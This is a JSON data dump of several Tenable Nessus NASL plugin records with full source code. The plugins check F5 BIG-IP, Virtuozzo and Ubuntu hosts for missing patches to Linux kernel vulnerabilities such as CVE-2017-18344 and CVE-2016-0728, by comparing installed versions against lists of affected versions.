"cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL07020416.NASL", "href": "https://www.tenable.com/plugins/nessus/151461", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K07020416.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(151461);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/28\");\n\n script_cve_id(\"CVE-2017-18344\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K07020416)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The timer_create syscall implementation in kernel/time/posix-timers.c\nin the Linux kernel before 4.14.8 doesn't properly validate the\nsigevent->sigev_notify field, which leads to out-of-bounds access in\nthe show_timer function (called when /proc/$PID/timers is read). This\nallows userspace applications to read arbitrary kernel memory (on a\nkernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n(CVE-2017-18344)\n\nImpact\n\nA local attacker may use this vulnerability to expose sensitive\ninformation or cause a denial of service (DoS), makingthe system\nunresponsive.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K07020416\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K07020416.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K07020416\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"16.0.0-16.0.1\",\"15.1.0-15.1.7\",\"14.1.0-14.1.5\",\"13.1.0-13.1.5\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"16.1.0\",\"15.1.8\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_note(port:0, extra:bigip_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:32", "description": "According to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the Linux kernel before 4.14.8 doesn't properly validate the sigevent::sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-07T00:00:00", "type": "nessus", "title": "Virtuozzo 7 : readykernel-patch (VZA-2018-050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2021-03-08T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:readykernel", "cpe:/o:virtuozzo:virtuozzo:7"], "id": "VIRTUOZZO_VZA-2018-050.NASL", "href": "https://www.tenable.com/plugins/nessus/111582", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111582);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2017-18344\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2018-050)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the\n Linux kernel before 4.14.8 doesn't properly validate\n the sigevent::sigev_notify field, which leads to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allows userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2950677\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openwall.com/lists/oss-security/2018/08/02/3\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?903233bb\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f3743365\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d05a0bee\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?07422f3e\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-40.4-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03069afa\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-43.10-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?547b160b\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-46.7-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59613f5f\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-48.2-56.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?07caf03d\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.11.6.vz7.40.4\",\n \"patch\",\"readykernel-patch-40.4-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.17.1.vz7.43.10\",\n \"patch\",\"readykernel-patch-43.10-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.46.7\",\n \"patch\",\"readykernel-patch-46.7-56.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.48.2\",\n \"patch\",\"readykernel-patch-48.2-56.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_NOTE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:17:42", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.\n(CVE-2015-5364)", "cvss3": {}, "published": "2017-02-22T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K17307)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5364"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL17307.NASL", "href": "https://www.tenable.com/plugins/nessus/97307", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K17307.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97307);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2015-5364\");\n script_bugtraq_id(75510);\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K17307)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux\nkernel before 4.0.6 do not properly consider yielding a processor,\nwhich allows remote attackers to cause a denial of service (system\nhang) via incorrect checksums within a UDP packet flood.\n(CVE-2015-5364)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17307\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K17307.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K17307\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.3.0-11.5.4\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.4.0-11.5.4\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.0.0-11.5.4\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0-11.6.1\",\"11.3.0-11.5.4\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"12.0.0HF1\",\"11.6.2\",\"11.6.1HF1\",\"11.5.5\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:30", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2870-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88011);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n 